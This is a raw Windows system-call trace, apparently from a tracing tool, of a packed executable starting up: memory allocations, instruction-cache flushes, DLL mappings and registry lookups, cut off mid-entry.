NtGdiQueryFontAssocInfo (0, ... ) == 0x0 00399 896 NtUserCallNoParam (24, ... ) == 0x0 00400 896 NtGdiCreateCompatibleDC (0, ... 00401 896 NtAllocateVirtualMemory (-1, 0, 0, 4096, 12288, 4, ... 4128768, 4096, ) == 0x0 00400 896 NtGdiCreateCompatibleDC ... ) == 0x860107ab 00402 896 NtGdiGetStockObject (0, ... ) == 0x1900010 00403 896 NtGdiGetStockObject (4, ... ) == 0x1900011 00404 896 NtGdiCreateBitmap (8, 8, 1, 1, 2118200212, ... ) == 0x870506a2 00405 896 NtGdiCreateSolidBrush (0, 0, ... 00406 896 NtAllocateVirtualMemory (-1, 0, 0, 4096, 12288, 4, ... 9764864, 4096, ) == 0x0 00405 896 NtGdiCreateSolidBrush ... ) == 0x1100680 00407 896 NtGdiGetStockObject (13, ... ) == 0x18a0021 00408 896 NtGdiCreateCompatibleDC (0, ... ) == 0xf6010687 00409 896 NtGdiSelectBitmap (-167704953, -2029713758, ... ) == 0x185000f 00410 896 NtUserGetThreadDesktop (896, 0, ... ) == 0x24 00411 896 NtOpenKey (0x20019, {24, 0, 0x40, 0, 0, (0x20019, {24, 0, 0x40, 0, 0, "\Registry\Machine\Software\Microsoft\Windows NT\CurrentVersion\Windows"}, ... 44, ) }, ... 44, ) == 0x0 00412 896 NtQueryValueKey (44, (44, "AppInit_DLLs", Partial, 64, ... TitleIdx=0, Type=1, Data="\0\0"}, 14, ) , Partial, 64, ... TitleIdx=0, Type=1, Data= (44, "AppInit_DLLs", Partial, 64, ... TitleIdx=0, Type=1, Data="\0\0"}, 14, ) }, 14, ) == 0x0 00413 896 NtClose (44, ... ) == 0x0 00414 896 NtUserFindExistingCursorIcon (1241132, 1241148, 1241196, ... ) == 0x10011 00415 896 NtUserRegisterClassExWOW (1241144, 1241212, 1241228, 1241244, 673, 128, 0, ... ) == 0x8177c017 00416 896 NtUserFindExistingCursorIcon (1241132, 1241148, 1241196, ... ) == 0x10011 00417 896 NtUserRegisterClassExWOW (1241144, 1241212, 1241228, 1241244, 674, 128, 0, ... ) == 0x8177c01c 00418 896 NtUserFindExistingCursorIcon (1241132, 1241148, 1241196, ... ) == 0x10011 00419 896 NtUserRegisterClassExWOW (1241144, 1241212, 1241228, 1241244, 675, 128, 0, ... ) == 0x8177c01e 00420 896 NtUserFindExistingCursorIcon (1241132, 1241148, 1241196, ... ) == 0x10011 00421 896 NtUserRegisterClassExWOW (1241144, 1241212, 1241228, 1241244, 676, 128, 0, ... ) == 0x81778002 00422 896 NtUserFindExistingCursorIcon (1241132, 1241148, 1241196, ... ) == 0x10013 00423 896 NtUserRegisterClassExWOW (1241144, 1241212, 1241228, 1241244, 677, 128, 0, ... ) == 0x8177c018 00424 896 NtUserFindExistingCursorIcon (1241132, 1241148, 1241196, ... ) == 0x10011 00425 896 NtUserRegisterClassExWOW (1241144, 1241212, 1241228, 1241244, 678, 128, 0, ... ) == 0x8177c01a 00426 896 NtUserFindExistingCursorIcon (1241132, 1241148, 1241196, ... ) == 0x10011 00427 896 NtUserRegisterClassExWOW (1241144, 1241212, 1241228, 1241244, 679, 128, 0, ... ) == 0x8177c01d 00428 896 NtUserFindExistingCursorIcon (1241132, 1241148, 1241196, ... ) == 0x10011 00429 896 NtUserRegisterClassExWOW (1241144, 1241212, 1241228, 1241244, 681, 128, 0, ... ) == 0x8177c026 00430 896 NtUserFindExistingCursorIcon (1241132, 1241148, 1241196, ... ) == 0x10011 00431 896 NtUserRegisterClassExWOW (1241144, 1241212, 1241228, 1241244, 680, 128, 0, ... ) == 0x8177c019 00432 896 NtUserRegisterClassExWOW (1241096, 1241164, 1241180, 1241196, 0, 128, 0, ... ) == 0x8177c020 00433 896 NtUserRegisterClassExWOW (1241352, 1241448, 1241432, 1241420, 0, 130, 0, ... ) == 0x8177c022 00434 896 NtUserRegisterClassExWOW (1241096, 1241164, 1241180, 1241196, 0, 128, 0, ... ) == 0x8177c023 00435 896 NtUserRegisterClassExWOW (1241352, 1241448, 1241432, 1241420, 0, 130, 0, ... ) == 0x8177c024 00436 896 NtUserRegisterClassExWOW (1241096, 1241164, 1241180, 1241196, 0, 128, 0, ... ) == 0x8177c025 00437 896 NtCallbackReturn (0, 0, 0, ... 00438 896 NtGdiInit (... ) == 0x1 00439 896 NtGdiGetStockObject (18, ... ) == 0x290001c 00440 896 NtGdiGetStockObject (19, ... ) == 0x1b00019 00441 896 NtTestAlert (... ) == 0x0 00442 896 NtContinue (1244464, 1, ... 00443 896 NtSetInformationThread (-2, Win32StartAddress(LpcReceivedMessageId), {StartAddress(LpcReceivedMsgId)=0x51dbd3,}, 4, ... ) == 0x0 00444 896 NtAllocateVirtualMemory (-1, 1331200, 0, 57344, 4096, 4, ... 1331200, 57344, ) == 0x0 00445 896 NtAllocateVirtualMemory (-1, 1388544, 0, 8192, 4096, 4, ... 1388544, 8192, ) == 0x0 00446 896 NtAllocateVirtualMemory (-1, 1396736, 0, 40960, 4096, 4, ... 1396736, 40960, ) == 0x0 00447 896 NtFlushInstructionCache (-1, 5364786, 65998, ... ) == 0x0 00448 896 NtFreeVirtualMemory (-1, (0x145000), 106496, 16384, ... (0x145000), 106496, ) == 0x0 00449 896 NtQuerySystemInformation (Basic, 44, ... {Unknown=0,MaximumIncrement=156250,PhysicalPageSize=0x1000,NumberOfPhysicalPages=0xff7c,LowestPhysicalPage=0x1,HighestPhysicalPage=0xffff,AllocationGranularity=0x10000,LowestUserAddress=0x10000,HighestUserAddress=0x7ffeffff,ActiveProcessors=1,NumberProcessors=1,}, 0x0, ) == 0x0 00450 896 NtAllocateVirtualMemory (-1, 0, 0, 65536, 8192, 4, ... 9830400, 65536, ) == 0x0 00451 896 NtAllocateVirtualMemory (-1, 9830400, 0, 65536, 4096, 4, ... 9830400, 65536, ) == 0x0 00452 896 NtQueryVirtualMemory (-1, 0x528e0c, Basic, 28, ... {BaseAddress=0x528000,AllocationBase=0x400000,AllocationProtect=0x80,RegionSize=0xf000,State=0x1000,Protect=0x40,Type=0x1000000,}, 28, ) == 0x0 00453 896 NtQueryInformationProcess (-1, 36, 4, ... {process info, class 36, size 4}, 0x0, ) == 0x0 00454 896 NtQueryInformationProcess (-1, 36, 4, ... {process info, class 36, size 4}, 0x0, ) == 0x0 00455 896 NtQueryVirtualMemory (-1, 0x0, Basic, 28, ... {BaseAddress=0x0,AllocationBase=0x0,AllocationProtect=0x0,RegionSize=0x10000,State=0x10000,Protect=0x1,Type=0x0,}, 28, ) == 0x0 00456 896 NtAllocateVirtualMemory (-1, 0, 0, 4096, 4096, 4, ... 9895936, 4096, ) == 0x0 00457 896 NtAllocateVirtualMemory (-1, 0, 0, 5098, 8192, 4, ... 9961472, 8192, ) == 0x0 00458 896 NtAllocateVirtualMemory (-1, 0, 0, 4096, 4096, 4, ... 10027008, 4096, ) == 0x0 00459 896 NtFlushInstructionCache (-1, 5365726, 46, ... ) == 0x0 00460 896 NtFlushInstructionCache (-1, 5365726, 80, ... ) == 0x0 00461 896 NtFlushInstructionCache (-1, 5365772, 175, ... ) == 0x0 00462 896 NtFlushInstructionCache (-1, 5365831, 27, ... ) == 0x0 00463 896 NtFlushInstructionCache (-1, 5365831, 60, ... ) == 0x0 00464 896 NtFlushInstructionCache (-1, 5365858, 71, ... ) == 0x0 00465 896 NtFlushInstructionCache (-1, 5365891, 38, ... ) == 0x0 00466 896 NtFlushInstructionCache (-1, 5365806, 178, ... ) == 0x0 00467 896 NtFlushInstructionCache (-1, 5365947, 37, ... ) == 0x0 00468 896 NtQueryInformationProcess (-1, DefaultHardErrorMode, 4, ... {process info, class 12, size 4}, 0x0, ) == 0x0 00469 896 NtSetInformationProcess (-1, DefaultHardErrorMode, {process info, class 12, size 4}, 4, ... ) == 0x0 00470 896 NtQueryAttributesFile ({24, 0, 0x40, 0, 0, ({24, 0, 0x40, 0, 0, "\??\u:\work\packed.exe"}, 1242756, ... ) }, 1242756, ... ) == 0x0 00471 896 NtOpenFile (0x100001, {24, 0, 0x40, 0, 0, (0x100001, {24, 0, 0x40, 0, 0, "\??\u:\"}, 3, 16417, ... 44, {status=0x0, info=1}, ) }, 3, 16417, ... 44, {status=0x0, info=1}, ) == 0x0 00472 896 NtQueryDirectoryFile (44, 0, 0, 0, 1242184, 616, BothDirectory, 1, (44, 0, 0, 0, 1242184, 616, BothDirectory, 1, "work", 0, ... {status=0x0, info=104}, ) , 0, ... {status=0x0, info=104}, ) == 0x0 00473 896 NtClose (44, ... ) == 0x0 00474 896 NtOpenFile (0x100001, {24, 0, 0x40, 0, 0, (0x100001, {24, 0, 0x40, 0, 0, "\??\u:\work\"}, 3, 16417, ... 44, {status=0x0, info=1}, ) }, 3, 16417, ... 44, {status=0x0, info=1}, ) == 0x0 00475 896 NtQueryDirectoryFile (44, 0, 0, 0, 1242184, 616, BothDirectory, 1, (44, 0, 0, 0, 1242184, 616, BothDirectory, 1, "packed.exe", 0, ... {status=0x0, info=120}, ) , 0, ... {status=0x0, info=120}, ) == 0x0 00476 896 NtClose (44, ... ) == 0x0 00477 896 NtQueryInformationProcess (-1, DefaultHardErrorMode, 4, ... {process info, class 12, size 4}, 0x0, ) == 0x0 00478 896 NtSetInformationProcess (-1, DefaultHardErrorMode, {process info, class 12, size 4}, 4, ... ) == 0x0 00479 896 NtQueryInformationProcess (-1, DefaultHardErrorMode, 4, ... {process info, class 12, size 4}, 0x0, ) == 0x0 00480 896 NtSetInformationProcess (-1, DefaultHardErrorMode, {process info, class 12, size 4}, 4, ... ) == 0x0 00481 896 NtQueryAttributesFile ({24, 0, 0x40, 0, 0, ({24, 0, 0x40, 0, 0, "\??\u:\work\packed.exe"}, 1242748, ... ) }, 1242748, ... ) == 0x0 00482 896 NtQueryInformationProcess (-1, DefaultHardErrorMode, 4, ... {process info, class 12, size 4}, 0x0, ) == 0x0 00483 896 NtSetInformationProcess (-1, DefaultHardErrorMode, {process info, class 12, size 4}, 4, ... ) == 0x0 00484 896 NtOpenFile (0x100001, {24, 0, 0x40, 0, 0, (0x100001, {24, 0, 0x40, 0, 0, "\??\U:\WORK\"}, 3, 16417, ... 44, {status=0x0, info=1}, ) }, 3, 16417, ... 44, {status=0x0, info=1}, ) == 0x0 00485 896 NtQueryDirectoryFile (44, 0, 0, 0, 1242900, 616, BothDirectory, 1, (44, 0, 0, 0, 1242900, 616, BothDirectory, 1, "*", 0, ... {status=0x0, info=100}, ) , 0, ... {status=0x0, info=100}, ) == 0x0 00486 896 NtAllocateVirtualMemory (-1, 1331200, 0, 8192, 4096, 4, ... 1331200, 8192, ) == 0x0 00487 896 NtQueryDirectoryFile (44, 0, 0, 0, 1329408, 4096, BothDirectory, 0, 0x0, 0, ... {status=0x0, info=336}, ) == 0x0 00488 896 NtCreateFile (0x80100080, {24, 0, 0x40, 0, 1243224, (0x80100080, {24, 0, 0x40, 0, 1243224, "\??\U:\WORK\TRACE.TXT"}, 0x0, 0, 1, 1, 96, 0, 0, ... ) }, 0x0, 0, 1, 1, 96, 0, 0, ... ) == STATUS_SHARING_VIOLATION 00489 896 NtRaiseException (1243232, 1242492, 1, ... 00490 896 NtQueryVirtualMemory (-1, 0x51c54c, Basic, 28, ... {BaseAddress=0x51c000,AllocationBase=0x400000,AllocationProtect=0x80,RegionSize=0x1000,State=0x1000,Protect=0x80,Type=0x1000000,}, 28, ) == 0x0 00491 896 NtQueryVirtualMemory (-1, 0x51c54c, Basic, 28, ... {BaseAddress=0x51c000,AllocationBase=0x400000,AllocationProtect=0x80,RegionSize=0x1000,State=0x1000,Protect=0x80,Type=0x1000000,}, 28, ) == 0x0 00492 896 NtContinue (1241460, 0, ... 00493 896 NtQueryDirectoryFile (44, 0, 0, 0, 1329408, 4096, BothDirectory, 0, 0x0, 0, ... ) == STATUS_NO_MORE_FILES 00494 896 NtClose (44, ... ) == 0x0 00495 896 NtAllocateVirtualMemory (-1, 0, 0, 1048576, 8192, 4, ... 10092544, 1048576, ) == 0x0 00496 896 NtAllocateVirtualMemory (-1, 10092544, 0, 69704, 4096, 4, ... 10092544, 73728, ) == 0x0 00497 896 NtAllocateVirtualMemory (-1, 10166272, 0, 69632, 4096, 4, ... 10166272, 69632, ) == 0x0 00498 896 NtAllocateVirtualMemory (-1, 10235904, 0, 69632, 4096, 4, ... 10235904, 69632, ) == 0x0 00499 896 NtAllocateVirtualMemory (-1, 10305536, 0, 69632, 4096, 4, ... 10305536, 69632, ) == 0x0 00500 896 NtOpenSection (0xe, {24, 8, 0x40, 0, 0, (0xe, {24, 8, 0x40, 0, 0, "ole32.dll"}, ... 44, ) }, ... 44, ) == 0x0 00501 896 NtMapViewOfSection (44, -1, (0x0), 0, 0, 0x0, 0, 1, 0, 4, ... (0x774e0000), 0x0, 1298432, ) == 0x0 00502 896 NtClose (44, ... ) == 0x0 00503 896 NtProtectVirtualMemory (-1, (0x774e1000), 2352, 4, ... (0x774e1000), 4096, 32, ) == 0x0 00504 896 NtProtectVirtualMemory (-1, (0x774e1000), 4096, 32, ... (0x774e1000), 4096, 4, ) == 0x0 00505 896 NtFlushInstructionCache (-1, 2001604608, 2352, ... ) == 0x0 00506 896 NtProtectVirtualMemory (-1, (0x774e1000), 2352, 4, ... (0x774e1000), 4096, 32, ) == 0x0 00507 896 NtProtectVirtualMemory (-1, (0x774e1000), 4096, 32, ... (0x774e1000), 4096, 4, ) == 0x0 00508 896 NtFlushInstructionCache (-1, 2001604608, 2352, ... ) == 0x0 00509 896 NtProtectVirtualMemory (-1, (0x774e1000), 2352, 4, ... (0x774e1000), 4096, 32, ) == 0x0 00510 896 NtProtectVirtualMemory (-1, (0x774e1000), 4096, 32, ... (0x774e1000), 4096, 4, ) == 0x0 00511 896 NtFlushInstructionCache (-1, 2001604608, 2352, ... ) == 0x0 00512 896 NtOpenSection (0xe, {24, 8, 0x40, 0, 0, (0xe, {24, 8, 0x40, 0, 0, "msvcrt.dll"}, ... 44, ) }, ... 44, ) == 0x0 00513 896 NtMapViewOfSection (44, -1, (0x0), 0, 0, 0x0, 0, 1, 0, 4, ... (0x77c10000), 0x0, 360448, ) == 0x0 00514 896 NtClose (44, ... ) == 0x0 00515 896 NtProtectVirtualMemory (-1, (0x77c11000), 632, 4, ... (0x77c11000), 4096, 32, ) == 0x0 00516 896 NtProtectVirtualMemory (-1, (0x77c11000), 4096, 32, ... (0x77c11000), 4096, 4, ) == 0x0 00517 896 NtFlushInstructionCache (-1, 2009141248, 632, ... ) == 0x0 00518 896 NtProtectVirtualMemory (-1, (0x774e1000), 2352, 4, ... (0x774e1000), 4096, 32, ) == 0x0 00519 896 NtProtectVirtualMemory (-1, (0x774e1000), 4096, 32, ... (0x774e1000), 4096, 4, ) == 0x0 00520 896 NtFlushInstructionCache (-1, 2001604608, 2352, ... ) == 0x0 00521 896 NtProtectVirtualMemory (-1, (0x774e1000), 2352, 4, ... (0x774e1000), 4096, 32, ) == 0x0 00522 896 NtProtectVirtualMemory (-1, (0x774e1000), 4096, 32, ... (0x774e1000), 4096, 4, ) == 0x0 00523 896 NtFlushInstructionCache (-1, 2001604608, 2352, ... ) == 0x0 00524 896 NtProtectVirtualMemory (-1, (0x774e1000), 2352, 4, ... (0x774e1000), 4096, 32, ) == 0x0 00525 896 NtProtectVirtualMemory (-1, (0x774e1000), 4096, 32, ... (0x774e1000), 4096, 4, ) == 0x0 00526 896 NtFlushInstructionCache (-1, 2001604608, 2352, ... ) == 0x0 00527 896 NtProtectVirtualMemory (-1, (0x774e1000), 2352, 4, ... (0x774e1000), 4096, 32, ) == 0x0 00528 896 NtProtectVirtualMemory (-1, (0x774e1000), 4096, 32, ... (0x774e1000), 4096, 4, ) == 0x0 00529 896 NtFlushInstructionCache (-1, 2001604608, 2352, ... ) == 0x0 00530 896 NtOpenKey (0x80000000, {24, 0, 0x40, 0, 0, (0x80000000, {24, 0, 0x40, 0, 0, "\Registry\Machine\Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\msvcrt.dll"}, ... ) }, ... ) == STATUS_OBJECT_NAME_NOT_FOUND 00531 896 NtQuerySystemInformation (Basic, 44, ... {Unknown=0,MaximumIncrement=156250,PhysicalPageSize=0x1000,NumberOfPhysicalPages=0xff7c,LowestPhysicalPage=0x1,HighestPhysicalPage=0xffff,AllocationGranularity=0x10000,LowestUserAddress=0x10000,HighestUserAddress=0x7ffeffff,ActiveProcessors=1,NumberProcessors=1,}, 0x0, ) == 0x0 00532 896 NtAllocateVirtualMemory (-1, 0, 0, 65536, 8192, 4, ... 11141120, 65536, ) == 0x0 00533 896 NtAllocateVirtualMemory (-1, 11141120, 0, 4096, 4096, 4, ... 11141120, 4096, ) == 0x0 00534 896 NtAllocateVirtualMemory (-1, 11145216, 0, 8192, 4096, 4, ... 11145216, 8192, ) == 0x0 00535 896 NtAllocateVirtualMemory (-1, 11153408, 0, 4096, 4096, 4, ... 11153408, 4096, ) == 0x0 00536 896 NtOpenSection (0x4, {24, 0, 0x40, 0, 0, (0x4, {24, 0, 0x40, 0, 0, "\NLS\NlsSectionCType"}, ... 44, ) }, ... 44, ) == 0x0 00537 896 NtMapViewOfSection (44, -1, (0x0), 0, 0, 0x0, 0, 2, 0, 2, ... (0xab0000), 0x0, 12288, ) == 0x0 00538 896 NtClose (44, ... ) == 0x0 00539 896 NtAllocateVirtualMemory (-1, 11157504, 0, 4096, 4096, 4, ... 11157504, 4096, ) == 0x0 00540 896 NtQueryVirtualMemory (-1, 0x77c2807c, Basic, 28, ... {BaseAddress=0x77c28000,AllocationBase=0x77c10000,AllocationProtect=0x80,RegionSize=0x35000,State=0x1000,Protect=0x20,Type=0x1000000,}, 28, ) == 0x0 00541 896 NtQueryInformationProcess (-1, 36, 4, ... {process info, class 36, size 4}, 0x0, ) == 0x0 00542 896 NtQueryInformationProcess (-1, 36, 4, ... {process info, class 36, size 4}, 0x0, ) == 0x0 00543 896 NtQueryVirtualMemory (-1, 0x528e0c, Basic, 28, ... {BaseAddress=0x528000,AllocationBase=0x400000,AllocationProtect=0x80,RegionSize=0xf000,State=0x1000,Protect=0x40,Type=0x1000000,}, 28, ) == 0x0 00544 896 NtOpenKey (0x80000000, {24, 0, 0x40, 0, 0, (0x80000000, {24, 0, 0x40, 0, 0, "\Registry\Machine\Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\ole32.dll"}, ... ) }, ... ) == STATUS_OBJECT_NAME_NOT_FOUND 00545 896 NtOpenFile (0x100001, {24, 0, 0x40, 0, 0, (0x100001, {24, 0, 0x40, 0, 0, "\Device\KsecDD"}, 7, 16, ... 44, {status=0x0, info=0}, ) }, 7, 16, ... 44, {status=0x0, info=0}, ) == 0x0 00546 896 NtDeviceIoControlFile (44, 0, 0x0, 0x0, 0x390008, (44, 0, 0x0, 0x0, 0x390008, "\256\2773J\253v\211\226\260Q\3401\210\241\335M\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0", 256, 256, ... , 256, 256, ... 00547 896 NtQuerySystemInformation (TimeOfDay, 48, ... {system info, class 3, size 48}, 48, ) == 0x0 00548 896 NtQuerySystemInformation (ProcessorTimes, 48, ... {system info, class 8, size 48}, 48, ) == 0x0 00549 896 NtQuerySystemInformation (Performance, 312, ... {system info, class 2, size 312}, 312, ) == 0x0 00550 896 NtQuerySystemInformation (Exception, 16, ... {system info, class 33, size 16}, 16, ) == 0x0 00551 896 NtQuerySystemInformation (Lookaside, 32, ... {system info, class 45, size 32}, 32, ) == 0x0 00552 896 NtQuerySystemInformation (ProcessorStatistics, 3016, ... {system info, class 23, size 0}, 0, ) == 0x0 00553 896 NtQuerySystemInformation (ProcessesAndThreads, 3008, ... ) == STATUS_INFO_LENGTH_MISMATCH 00554 896 NtCreateKey (0x2, {24, 0, 0x240, 0, 0, (0x2, {24, 0, 0x240, 0, 0, "\Registry\Machine\SOFTWARE\Microsoft\Cryptography\RNG"}, 0, 0x0, 0, ... -2147481368, 2, ) }, 0, 0x0, 0, ... -2147481368, 2, ) == 0x0 00555 896 NtSetValueKey (-2147481368, (-2147481368, "Seed", 0, 3, "\342O'>\315\10\343\335,\360)\\344M\230]\313W*\35\20\32\313\214\313\215r\0\335\265uB\276\325V\363I\255\340\2047\305\36\222\17%\353\362\212]\332\316\225]\230\2054r\263\263)\354\231\263\230#u\241\307\225\344\276\201~\214v\6 \234", 80, ... , 0, 3, (-2147481368, "Seed", 0, 3, "\342O'>\315\10\343\335,\360)\\344M\230]\313W*\35\20\32\313\214\313\215r\0\335\265uB\276\325V\363I\255\340\2047\305\36\222\17%\353\362\212]\332\316\225]\230\2054r\263\263)\354\231\263\230#u\241\307\225\344\276\201~\214v\6 \234", 80, ... , 80, ... 00556 896 NtSetInformationFile (-2147482448, -135750052, 8, EndOfFile, ... {status=0x0, info=0}, ) == 0x0 00557 896 NtSetInformationFile (-2147482448, -135750088, 8, EndOfFile, ... {status=0x0, info=0}, ) == 0x0 00558 896 NtSetInformationFile (-2147482448, -135750120, 8, EndOfFile, ... {status=0x0, info=0}, ) == 0x0 00555 896 NtSetValueKey ... ) == 0x0 00559 896 NtClose (-2147481368, ... ) == 0x0 00546 896 NtDeviceIoControlFile ... {status=0x0, info=256}, ... {status=0x0, info=256}, "9\276KR\243\331\356\334\34+~\264\341\203B0`\346\236\2E[b\363\236_\235Tou2$4\3727\251\27\366\237=O!J\300\337\365\0\275SG\245i\360\220\271\273\213\201N\206`\337\356\244\241, ) , ) == 0x0 00560 896 NtQuerySystemInformation (Basic, 44, ... {Unknown=0,MaximumIncrement=156250,PhysicalPageSize=0x1000,NumberOfPhysicalPages=0xff7c,LowestPhysicalPage=0x1,HighestPhysicalPage=0xffff,AllocationGranularity=0x10000,LowestUserAddress=0x10000,HighestUserAddress=0x7ffeffff,ActiveProcessors=1,NumberProcessors=1,}, 0x0, ) == 0x0 00561 896 NtQuerySystemInformation (Processor, 12, ... {system info, class 1, size 12}, 0x0, ) == 0x0 00562 896 NtOpenKey (0x20019, {24, 28, 0x40, 0, 0, (0x20019, {24, 28, 0x40, 0, 0, "SYSTEM\CurrentControlSet\Control\Session Manager"}, ... 48, ) }, ... 48, ) == 0x0 00563 896 NtQueryValueKey (48, (48, "CriticalSectionTimeout", Partial, 144, ... TitleIdx=0, Type=4, Data="\0\215'\0"}, 16, ) , Partial, 144, ... TitleIdx=0, Type=4, Data= (48, "CriticalSectionTimeout", Partial, 144, ... TitleIdx=0, Type=4, Data="\0\215'\0"}, 16, ) }, 16, ) == 0x0 00564 896 NtClose (48, ... ) == 0x0 00565 896 NtOpenKey (0x20019, {24, 28, 0x40, 0, 0, (0x20019, {24, 28, 0x40, 0, 0, "Software\Microsoft\Ole"}, ... 48, ) }, ... 48, ) == 0x0 00566 896 NtQueryValueKey (48, (48, "RWLockResourceTimeOut", Partial, 144, ... ) , Partial, 144, ... ) == STATUS_OBJECT_NAME_NOT_FOUND 00567 896 NtClose (48, ... ) == 0x0 00568 896 NtQuerySystemInformation (Basic, 44, ... {Unknown=0,MaximumIncrement=156250,PhysicalPageSize=0x1000,NumberOfPhysicalPages=0xff7c,LowestPhysicalPage=0x1,HighestPhysicalPage=0xffff,AllocationGranularity=0x10000,LowestUserAddress=0x10000,HighestUserAddress=0x7ffeffff,ActiveProcessors=1,NumberProcessors=1,}, 0x0, ) == 0x0 00569 896 NtQuerySystemInformation (Processor, 12, ... {system info, class 1, size 12}, 0x0, ) == 0x0 00570 896 NtQuerySystemInformation (Basic, 44, ... {Unknown=0,MaximumIncrement=156250,PhysicalPageSize=0x1000,NumberOfPhysicalPages=0xff7c,LowestPhysicalPage=0x1,HighestPhysicalPage=0xffff,AllocationGranularity=0x10000,LowestUserAddress=0x10000,HighestUserAddress=0x7ffeffff,ActiveProcessors=1,NumberProcessors=1,}, 0x0, ) == 0x0 00571 896 NtQuerySystemInformation (Processor, 12, ... {system info, class 1, size 12}, 0x0, ) == 0x0 00572 896 NtOpenKey (0x20019, {24, 0, 0x40, 0, 0, (0x20019, {24, 0, 0x40, 0, 0, "\Registry\Machine\Software\Classes\Interface"}, ... 48, ) }, ... 48, ) == 0x0 00573 896 NtQueryValueKey (48, (48, "InterfaceHelperDisableAll", Full, 0, ... ) , Full, 0, ... ) == STATUS_OBJECT_NAME_NOT_FOUND 00574 896 NtQueryValueKey (48, (48, "InterfaceHelperDisableAllForOle32", Full, 0, ... ) , Full, 0, ... ) == STATUS_OBJECT_NAME_NOT_FOUND 00575 896 NtQueryValueKey (48, (48, "InterfaceHelperDisableTypeLib", Full, 0, ... ) , Full, 0, ... ) == STATUS_OBJECT_NAME_NOT_FOUND 00576 896 NtClose (48, ... ) == 0x0 00577 896 NtOpenKey (0x20019, {24, 0, 0x40, 0, 0, (0x20019, {24, 0, 0x40, 0, 0, "\Registry\Machine\Software\Classes\Interface\{00020400-0000-0000-C000-000000000046}"}, ... 48, ) }, ... 48, ) == 0x0 00578 896 NtQueryValueKey (48, (48, "InterfaceHelperDisableAll", Full, 0, ... ) , Full, 0, ... ) == STATUS_OBJECT_NAME_NOT_FOUND 00579 896 NtQueryValueKey (48, (48, "InterfaceHelperDisableAllForOle32", Full, 0, ... ) , Full, 0, ... ) == STATUS_OBJECT_NAME_NOT_FOUND 00580 896 NtClose (48, ... ) == 0x0 00581 896 NtOpenDirectoryObject (0x2000f, {24, 0, 0x40, 0, 0, (0x2000f, {24, 0, 0x40, 0, 0, "\BaseNamedObjects"}, ... 48, ) }, ... 48, ) == 0x0 00582 896 NtOpenEvent (0x1f0003, {24, 48, 0x0, 0, 0, (0x1f0003, {24, 48, 0x0, 0, 0, "HookSwitchHookEnabledEvent"}, ... ) }, ... ) == STATUS_OBJECT_NAME_NOT_FOUND 00583 896 NtOpenSection (0xe, {24, 8, 0x40, 0, 0, (0xe, {24, 8, 0x40, 0, 0, "oleaut32.dll"}, ... 52, ) }, ... 52, ) == 0x0 00584 896 NtMapViewOfSection (52, -1, (0x0), 0, 0, 0x0, 0, 1, 0, 4, ... (0x77120000), 0x0, 569344, ) == 0x0 00585 896 NtClose (52, ... ) == 0x0 00586 896 NtProtectVirtualMemory (-1, (0x77121000), 1272, 4, ... (0x77121000), 4096, 32, ) == 0x0 00587 896 NtProtectVirtualMemory (-1, (0x77121000), 4096, 32, ... (0x77121000), 4096, 4, ) == 0x0 00588 896 NtFlushInstructionCache (-1, 1997672448, 1272, ... ) == 0x0 00589 896 NtProtectVirtualMemory (-1, (0x77121000), 1272, 4, ... (0x77121000), 4096, 32, ) == 0x0 00590 896 NtProtectVirtualMemory (-1, (0x77121000), 4096, 32, ... (0x77121000), 4096, 4, ) == 0x0 00591 896 NtFlushInstructionCache (-1, 1997672448, 1272, ... ) == 0x0 00592 896 NtProtectVirtualMemory (-1, (0x77121000), 1272, 4, ... (0x77121000), 4096, 32, ) == 0x0 00593 896 NtProtectVirtualMemory (-1, (0x77121000), 4096, 32, ... (0x77121000), 4096, 4, ) == 0x0 00594 896 NtFlushInstructionCache (-1, 1997672448, 1272, ... ) == 0x0 00595 896 NtProtectVirtualMemory (-1, (0x77121000), 1272, 4, ... (0x77121000), 4096, 32, ) == 0x0 00596 896 NtProtectVirtualMemory (-1, (0x77121000), 4096, 32, ... (0x77121000), 4096, 4, ) == 0x0 00597 896 NtFlushInstructionCache (-1, 1997672448, 1272, ... ) == 0x0 00598 896 NtProtectVirtualMemory (-1, (0x77121000), 1272, 4, ... (0x77121000), 4096, 32, ) == 0x0 00599 896 NtProtectVirtualMemory (-1, (0x77121000), 4096, 32, ... (0x77121000), 4096, 4, ) == 0x0 00600 896 NtFlushInstructionCache (-1, 1997672448, 1272, ... ) == 0x0 00601 896 NtProtectVirtualMemory (-1, (0x77121000), 1272, 4, ... (0x77121000), 4096, 32, ) == 0x0 00602 896 NtProtectVirtualMemory (-1, (0x77121000), 4096, 32, ... (0x77121000), 4096, 4, ) == 0x0 00603 896 NtFlushInstructionCache (-1, 1997672448, 1272, ... ) == 0x0 00604 896 NtProtectVirtualMemory (-1, (0x77121000), 1272, 4, ... (0x77121000), 4096, 32, ) == 0x0 00605 896 NtProtectVirtualMemory (-1, (0x77121000), 4096, 32, ... (0x77121000), 4096, 4, ) == 0x0 00606 896 NtFlushInstructionCache (-1, 1997672448, 1272, ... ) == 0x0 00607 896 NtOpenKey (0x80000000, {24, 0, 0x40, 0, 0, (0x80000000, {24, 0, 0x40, 0, 0, "\Registry\Machine\Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\oleaut32.dll"}, ... ) }, ... ) == STATUS_OBJECT_NAME_NOT_FOUND 00608 896 NtUserRegisterWindowMessage ( ("{FB8F0821-0164-101B-84ED-08002B2EC713}", ... ) , ... ) == 0xc077 00609 896 NtOpenKey (0x1, {24, 28, 0x40, 0, 0, (0x1, {24, 28, 0x40, 0, 0, "SOFTWARE\Microsoft\OLEAUT"}, ... ) }, ... ) == 